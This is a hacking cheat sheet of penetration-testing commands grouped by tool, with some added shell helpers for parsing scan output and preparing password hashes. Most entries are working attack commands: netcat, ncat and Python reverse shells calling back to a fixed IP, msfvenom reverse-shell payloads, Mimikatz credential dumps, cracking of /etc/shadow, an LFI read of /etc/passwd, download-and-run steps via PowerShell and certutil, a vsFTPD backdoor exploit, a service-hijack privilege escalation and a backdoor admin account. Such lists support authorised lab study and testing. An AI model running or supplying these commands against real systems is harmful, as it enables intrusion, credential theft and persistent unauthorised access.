Hacking cheatsheet
Hacking command list

Netcat

Connect to a port
nc -nv 192.168.1.10 110
Bind a port and connect to it
nc -nlvp 4444
nc -nv 192.168.1.10 4444
Copy files (the listener writes, the client sends; nc does not close by itself, so end the client with Ctrl-C once the transfer is done and verify with a checksum on both sides)
nc -nlvp 4444 > dest-file
nc -nv 192.168.1.10 4444 < local-file
Bind shell and remote execution (-e needs a netcat built with it, e.g. netcat-traditional or the Windows build; the OpenBSD nc shipped on many distributions has no -e)
nc -nlvp 4444 -e cmd.exe
nc -nv 192.168.1.10 4444
Reverse shell
nc -nlvp 4444
nc -nv 192.168.1.10 4444 -e /bin/bash
Scan ports (-z: send no data, -w 1: one-second timeout)
nc -nvv -w 1 -z 192.168.1.10 3388-3390

Ncat

Bind shell over SSL, accepting connections from a single allowed IP address
ncat --exec cmd.exe --allow 192.168.1.11 -vnl 4444 --ssl
ncat -v 192.168.1.10 4444 --ssl
Reverse shell over SSL
ncat -vnl 4444 --ssl
ncat -nv 192.168.1.10 4444 --ssl --exec /bin/bash

Tcpdump

Read a .pcap file
tcpdump -r file.pcap
Filter by source host
tcpdump -n src host 172.16.40.10
Filter by destination host
tcpdump -n dst host 172.16.40.10
Filter by port
tcpdump -n port 80
Print packet data in hex and ASCII, including the link-layer header
tcpdump -nXX
Packets with both PSH and ACK set (tcp[13] is the TCP flags byte: PSH=8, ACK=16, so 24 matches exactly PSH+ACK and nothing else; 'tcp[13] & 24 != 0' matches either flag)
tcpdump -A -n 'tcp[13] = 24'
Capture full 1500-byte frames (-s sets the snaplen, older tcpdump defaults to 68 bytes) and print hex for port 110 on tap0
tcpdump -i tap0 -nXX -s 1500 port 110
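The tcp[13] filters above are easy to get wrong by hand, so here is an added helper (not part of the original cheatsheet) that builds them from flag names and decodes a flags byte back into names. It assumes nothing beyond POSIX sh and the standard TCP flag bit values (FIN=1, SYN=2, RST=4, PSH=8, ACK=16, URG=32, ECE=64, CWR=128); the function names are my own.

```shell
#!/bin/sh
# TCP flag bits as laid out in byte 13 of the TCP header (tcp[13] in BPF).

# tcpflags_byte FLAG... -> numeric value of the flag combination
tcpflags_byte() {
    total=0
    for f in "$@"; do
        case "$f" in
            FIN) bit=1 ;;
            SYN) bit=2 ;;
            RST) bit=4 ;;
            PSH) bit=8 ;;
            ACK) bit=16 ;;
            URG) bit=32 ;;
            ECE) bit=64 ;;
            CWR) bit=128 ;;
            *) echo "unknown flag: $f" >&2; return 1 ;;
        esac
        total=$((total | bit))
    done
    echo "$total"
}

# tcpflags_decode N -> names of the flags set in N, space separated, low bit first
tcpflags_decode() {
    n=$1; out=""
    for pair in FIN:1 SYN:2 RST:4 PSH:8 ACK:16 URG:32 ECE:64 CWR:128; do
        name=${pair%%:*}; bit=${pair##*:}
        if [ $((n & bit)) -ne 0 ]; then
            out="${out:+$out }$name"
        fi
    done
    echo "$out"
}

# bpf_flags_exact FLAG... -> packets with exactly these flags and no others
bpf_flags_exact() {
    v=$(tcpflags_byte "$@") || return 1
    echo "tcp[13] = $v"
}

# bpf_flags_all FLAG... -> packets with all of these flags (others don't care)
bpf_flags_all() {
    v=$(tcpflags_byte "$@") || return 1
    echo "tcp[13] & $v = $v"
}

# bpf_flags_any FLAG... -> packets with at least one of these flags
bpf_flags_any() {
    v=$(tcpflags_byte "$@") || return 1
    echo "tcp[13] & $v != 0"
}

# Usage: tcpdump -A -n "$(bpf_flags_exact PSH ACK)"   # same as 'tcp[13] = 24'
#        tcpdump -n "$(bpf_flags_all SYN ACK)"         # SYN/ACK replies, any other flags allowed
```

The exact form is what the cheatsheet uses; the `&` forms are usually what you want when looking for, say, every SYN regardless of whether ACK or ECN bits accompany it.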

theHarvester

Search all sources for emails and hosts
theharvester -d domain.com -b all
Search employees on LinkedIn
theharvester -d domain.com -b linkedin
Search emails and query the discovered hosts in Shodan (-h in older releases; the Shodan option has changed across versions, check --help)
theharvester -d domain.com -b bing -h

host

Find name servers
host -t ns domain.com
Find mail servers
host -t mx domain.com
Find address and mail servers
host domain.com
Reverse lookup
host 1.2.3.4
Transfer a DNS zone (AXFR) from a given name server
host -l domain.com domain-nameserver.com
Try a zone transfer against every NS of the domain (keeps only the A records)
HOST=host.com; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done
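The one-liner above relies on `$4` of the `host -t ns` output and silently drops everything except A records. Here is an added, more robust version (my own script, not from the original page) that parses the name server list, tries AXFR on each server, reports which ones refused, and prints every record of a successful transfer. It assumes the `host` utility from BIND and its usual output format ("domain name server ns1.domain.", a "Using domain server" banner, and "; Transfer failed." on refusal); `domain.com` and the record lines in the test are constructed samples.

```shell
#!/bin/sh
# ns_from_host_output: read "host -t ns DOMAIN" output on stdin and print the
# bare name server hostnames (trailing dot stripped), one per line.
ns_from_host_output() {
    awk '/ name server / { sub(/\.$/, "", $NF); print $NF }'
}

# records_from_axfr: keep only resource-record lines from "host -l" output,
# dropping the "Using domain server" banner, its Name/Address/Aliases lines,
# comment lines and blanks.
records_from_axfr() {
    grep -v -e '^Using domain server' -e '^Name:' -e '^Address:' \
            -e '^Aliases:' -e '^;' -e '^$'
}

# axfr_all DOMAIN: try an AXFR against every authoritative name server of
# DOMAIN. Prints the records of each successful transfer and returns 0 if at
# least one server answered, 1 if all refused (or no NS was found).
axfr_all() {
    domain=$1
    status=1
    for ns in $(host -t ns "$domain" | ns_from_host_output); do
        out=$(host -l "$domain" "$ns" 2>&1)
        if printf '%s\n' "$out" | grep -q -e 'Transfer failed' -e 'connection timed out' -e 'not found'; then
            echo "[-] $ns refused the transfer"
        else
            echo "[+] $ns answered AXFR for $domain:"
            printf '%s\n' "$out" | records_from_axfr
            status=0
        fi
    done
    return $status
}

# Usage: axfr_all domain.com
```

A refusal from every server is the expected result on a well-configured domain; a success is a finding in itself, since the transfer hands over the whole zone, including internal hostnames.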

dnsrecon

Try a DNS zone transfer
dnsrecon -d domain.com -t axfr

dnsenum

Enumerate hosts in a domain
dnsenum domain.com

Nmap

TCP connect scan (full three-way handshake, works without root)
nmap -sT 10.11.11.123
SYN scan of all 65535 ports
nmap -sS 1.1.1.1 -p-
Identify live hosts in the network (ping sweep, no port scan: ICMP echo plus TCP 80/443 probes when run as root), grepable output
nmap -sn -v 10.11.1.1-254 -oG host.txt
Scan port 80 on all hosts
nmap -p 80 10.11.1.1-254 -oG web-host.txt
OS, version, traceroute and default-script scan (-A) of the 20 most common ports in a range
nmap -sT -A --top-ports 20 10.11.1.1-254 -oG top-ports.txt
OS scan
nmap -O 10.11.11.123
Service version scan
nmap -sV -sT 10.11.11.123
Script: discover SMB OS and host version
nmap 10.11.11.123 -p 139,445 --script smb-os-discovery
Script: DNS zone transfer
nmap --script dns-zone-transfer -p 53 ns2.domain.com
Scan for SMB services (139 netbios-ssn, 445 microsoft-ds)
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
Enumerate common HTTP paths
nmap -v -p 80 192.168.56.101 --script http-enum
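Several commands above write grepable output (`host.txt`, `web-host.txt`, `smb.txt`), and the next step is always "which hosts have port X open". Here are added helpers (my own, not from the original page) that parse `-oG` files with awk instead of eyeballing them. They assume the documented `-oG` layout (tab-separated fields: `Host: IP (NAME)`, then `Status: Up` or `Ports: PORT/STATE/PROTO//SERVICE///, ...`); the sample file the script writes is constructed, not real scan output.

```shell
#!/bin/sh
# Helpers for nmap grepable (-oG) output such as smb.txt / web-host.txt above.

# og_sample_file: write a constructed -oG file (not a real scan) to a temp
# file and print its path, so the helpers can be exercised offline.
og_sample_file() {
    f=$(mktemp)
    {
        printf '# Nmap 7.80 scan initiated as: nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254\n'
        printf 'Host: 10.11.1.5 ()\tStatus: Up\n'
        printf 'Host: 10.11.1.5 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (0)\n'
        printf 'Host: 10.11.1.7 ()\tStatus: Up\n'
        printf 'Host: 10.11.1.7 ()\tPorts: 139/filtered/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///\n'
        printf 'Host: 10.11.1.31 ()\tStatus: Up\n'
        printf 'Host: 10.11.1.31 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\n'
        printf 'Host: 10.11.1.40 ()\tStatus: Down\n'
        printf '# Nmap done -- 254 IP addresses (3 hosts up) scanned\n'
    } > "$f"
    echo "$f"
}

# og_up_hosts FILE -> IPs reported "Status: Up" (what you want from -sn output)
og_up_hosts() {
    awk -F'\t' '/^Host: / && $2 == "Status: Up" { split($1, h, " "); print h[2] }' "$1"
}

# og_hosts_with_open FILE PORT -> IPs on which PORT is open (filtered/closed excluded)
og_hosts_with_open() {
    awk -F'\t' -v port="$2" '
        /^Host: / {
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
                n = split(substr($i, 8), e, ", ")
                for (j = 1; j <= n; j++) {
                    split(e[j], p, "/")        # p[1]=port p[2]=state p[3]=proto p[5]=service
                    if (p[1] == port && p[2] == "open") { split($1, h, " "); print h[2]; break }
                }
            }
        }' "$1"
}

# og_open_ports FILE IP -> "port/proto" for every open port on IP
og_open_ports() {
    awk -F'\t' -v ip="$2" '
        /^Host: / {
            split($1, h, " ")
            if (h[2] != ip) next
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
                n = split(substr($i, 8), e, ", ")
                for (j = 1; j <= n; j++) {
                    split(e[j], p, "/")
                    if (p[2] == "open") print p[1] "/" p[3]
                }
            }
        }' "$1"
}

# Usage: og_hosts_with_open smb.txt 445 > smb-targets.txt
```

Parsing the state field matters: `grep 445` on `smb.txt` would also return hosts where 445 is filtered or closed, which is exactly the noise you do not want in a target list.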

SMB

Discover SMB hosts in a network: IP, NetBIOS name and logged-in user
nbtscan -r 10.11.1.0/24
Enumerate everything enum4linux can get (users, shares, password policy, OS)
enum4linux -a 10.11.1.227
Check a specific vulnerability (MS08-067); unsafe=1 enables checks that may crash the service
nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1 10.13.10.4
Enumerate shares
nmap --script smb-enum-shares 10.13.10.4 -p139,445 -T4
Map SMB shares and their permissions
smbmap -H 10.14.15.16 -u guest
Mount a share (vers=1.0 forces SMBv1 for legacy hosts; current kernels and Samba disable SMBv1 by default, so drop it for modern targets)
mount -t cifs -o vers=1.0,username=guest,password="" //10.11.12.13/wwwroot /tmp/path

SMTP

Connect to SMTP and check whether a user exists
nc -nv 192.168.56.101 25
# Check if user exists (252/250 = exists, 550 = unknown; many servers disable VRFY, try EXPN or RCPT TO instead)
VRFY root

SNMP

  • Port: 161
  • Type: UDP
Brute force community strings from a list (public, private, manager, etc.)
onesixtyone -c snmp_strings.txt 127.0.0.1
Enumerate the MIB tree
snmpwalk -c public -v1 127.0.0.1
Enumerate a specific SNMP OID subtree (version is -v1 or -v2c; e.g. 1.3.6.1.4.1.77.1.2.25 lists Windows user accounts)
snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>

msfvenom

PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.11.0.49 LPORT=443 -f raw > shell.php
Windows bind shell (only useful when no firewall blocks inbound connections), C format, encoded and avoiding bad characters
msfvenom -p windows/shell_bind_tcp LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
ASP reverse shell for Microsoft IIS
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=4445 -f asp > shell.asp
Windows executable reverse shell, 9 encoding iterations
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe

GCC / compilation

Regular compilation (linking against OpenSSL's libcrypto)
gcc -o OpenFuck 47080.c -lcrypto
Compile a 32-bit binary on an x86_64 host (needs gcc-multilib; --hash-style=both keeps the binary loadable on old glibc that only understands the SysV hash section)
gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
gcc -m32 -Wl,--hash-style=both -o udev udev.c

Nikto

Analyse a web server with default settings
nikto -host http://10.11.1.10

dirb

Scan web service directories and files
dirb http://192.168.1.10
Scan non-recursively (-r), silently without printing attempts (-S), with the bigger wordlist
dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt -r -S

FTP

Non-interactive FTP download from Windows (cmd.exe): build a script file and feed it to ftp with -s (-n disables auto-login, so the USER line and the password line that follows it do the login)
echo open 10.11.0.49 21 > ftp.txt
echo USER xnaaro >> ftp.txt
>> ftp.txt echo 12345
echo bin >> ftp.txt
echo GET wget.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
The password line puts the redirection first on purpose: cmd.exe treats a digit immediately before > as a file-handle number, so "echo 12345>> ftp.txt" would write nothing to the file, and "echo 12345 >> ftp.txt" would append a trailing space to the password.

Mimikatz

Non-interactive credential dump (needs local admin, privilege::debug acquires SeDebugPrivilege)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

Webserver

Create a Python web server serving the current directory (Python 2; on Python 3 the module is http.server)
python -m SimpleHTTPServer 80

NoSQLmap

python nosqlmap.py --attack 2 --victim host.name --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON

NoSQL user/pass enumeration

# Git repository: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
python3 nosqli_enumeration.py -u http://localhost/index.php -up email -pp password -ep password -m POST

Searchsploit

Search for an exploit
searchsploit <name>
See exploit code
searchsploit -x /path/exploit
Copy (mirror) an exploit to the current directory
searchsploit -m path/exploit

John the Ripper

Merge passwd and shadow files
unshadow /etc/passwd /etc/shadow > unshadow.txt
Crack passwords
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt
Crack an SSH key passphrase
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Mutate a cewl dictionary with John's rules
john --wordlist=cewl_words.txt --rules --stdout > mutated_words

hashcat

Crack Linux sha512crypt ($6$) passwords (-m 1800; -O uses the optimized kernels, which cap the password length; --force ignores warnings and should not be needed on a working driver setup)
hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force
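Two things the John and hashcat entries above leave implicit are what `unshadow` actually produces and how to pick the hashcat mode from the hash prefix. Here is an added script (my own, not from the original page or from the John/hashcat projects) that reproduces the unshadow join with awk, maps crypt(3) prefixes to the hashcat `-m` number and John format, and extracts only the crackable `user:hash` lines for `hashcat --username`. The passwd/shadow fragments it writes are constructed samples with placeholder hashes that only have the right prefixes.

```shell
#!/bin/sh
# mk_samples: write constructed /etc/passwd and /etc/shadow fragments (not from
# a real host; hashes are placeholders) into a temp directory and print its path.
mk_samples() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/sh
EOF
    cat > "$d/shadow" <<'EOF'
root:$6$YfGhTy1k$PLACEHOLDERsha512cryptHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$1$saltsalt$PLACEHOLDERmd5cryptHASH:18000:0:99999:7:::
bob:!:18000:0:99999:7:::
EOF
    echo "$d"
}

# unshadow_merge PASSWD SHADOW: what unshadow(8) does, join on the username and
# replace the 'x' placeholder in field 2 of passwd with the hash field of shadow.
unshadow_merge() {
    awk -F: 'NR == FNR { hash[$1] = $2; next }
             $1 in hash { $2 = hash[$1] }
             { print }' OFS=: "$2" "$1"
}

# crypt_hash_mode HASH: map a crypt(3) hash prefix to "<hashcat -m> <john format>".
# "-" means hashcat has no mode for it.
crypt_hash_mode() {
    case "$1" in
        '$1$'*)                  echo "500 md5crypt" ;;
        '$5$'*)                  echo "7400 sha256crypt" ;;
        '$6$'*)                  echo "1800 sha512crypt" ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo "3200 bcrypt" ;;
        '$y$'*|'$7$'*)           echo "- yescrypt (use john --format=crypt)" ;;
        '!'*|'*'*|'')            echo "- locked or no password" ;;
        *)                       echo "- unknown" ;;
    esac
}

# hashcat_input UNSHADOW_FILE: emit "user:hash" for crackable entries only
# (locked accounts with *, ! or an empty field are skipped).
# Feed the result to: hashcat --username -m <mode> file wordlist
hashcat_input() {
    awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }' "$1"
}

# Usage: d=$(mk_samples); unshadow_merge "$d/passwd" "$d/shadow" > unshadow.txt
#        hashcat_input unshadow.txt > passwd.hash
```

Filtering the locked accounts out before cracking avoids hashcat's "no hashes loaded" noise and, more importantly, keeps one mode per input file: a mixed `$1$`/`$6$` file has to be split by prefix because hashcat takes a single `-m`.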

File inclusion

LFI example (the trailing %00 null byte truncates whatever extension the script appends; this only works on PHP older than 5.3.4, later versions reject null bytes in file paths)
http://10.12.13.14/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00

Shells

Upgrade to an interactive bash shell with a pty
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && export SHELL=bash
Escape a restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.49",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Mysql

Non-interactive queries
mysql -u <user> -p<passwd> -D otrs -e "show databases;"

Robots.txt

Fetch robots.txt as a search engine agent (some sites serve different content to crawlers)
curl --user-agent Googlebot http://10.11.12.13/robots.txt -v

Hydra

Generate a password list from the words on a website (minimum word length 2)
cewl http://10.11.12.13 -m 2 -w output
Brute force a login form (the last field is a string that appears only in failed responses; any response without it counts as a success, so pick it carefully)
hydra -L usernames.txt -P passwords.txt <IP> <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail>"
# Example
hydra -L usernames -P output 10.11.12.13 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:F=Login"

Fuzzing

ffuf

Silent directory fuzzing (-s: silent, -r: follow redirects)
ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.168:8080/FUZZ

Whatweb

$ whatweb http://10.10.10.168:8080
http://10.10.10.168:8080 [200 OK] Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[BadHTTPServer], IP[10.10.10.168], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]

Windows commands

Create an admin user with RDP access
net user xnaaro 12345 /add
net localgroup administrators xnaaro /add
net localgroup "Remote Desktop Users" xnaaro /add
Quick local enumeration
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Downloads

Download a file with PowerShell
  • Option 1: write a one-line script from cmd.exe and run it
echo (New-Object System.Net.WebClient).DownloadFile("http://10.11.0.49/wget.exe", "wget.exe") > wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  • Option 2: inline, no script file on disk
PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.49/wget.exe','wget.exe')
Non-interactive download (script built line by line from cmd.exe, where $ needs no escaping)
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.49/wget.exe" >>wget.ps1
echo $file = "wget.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Download a file with certutil
certutil -urlcache -split -f "http://10.11.0.49/wget.exe" wget.exe

Windows exploit suggester

Run against the output of systeminfo copied from the target to the local host (the database is fetched beforehand with --update)
./windows-exploit-suggester.py --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo

Well-known exploits

Common vulnerabilities

vsFTPD 2.3.4 (backdoored release: logging in with a username containing ":)" opens a root shell on port 6200)

Exploit and reverse shell
python3 vsftpd_234_exploit.py 192.168.56.101 21 "sh -c 'nc -nv 192.168.56.1 44444 -e /bin/bash > /dev/null 2>&1 &'"

Windows XP SP1 privilege escalation (the upnphost service is configurable by Authenticated Users; repoint its binary at a reverse shell so it runs as LocalSystem when the service starts)

sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10.11.0.49 10000 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost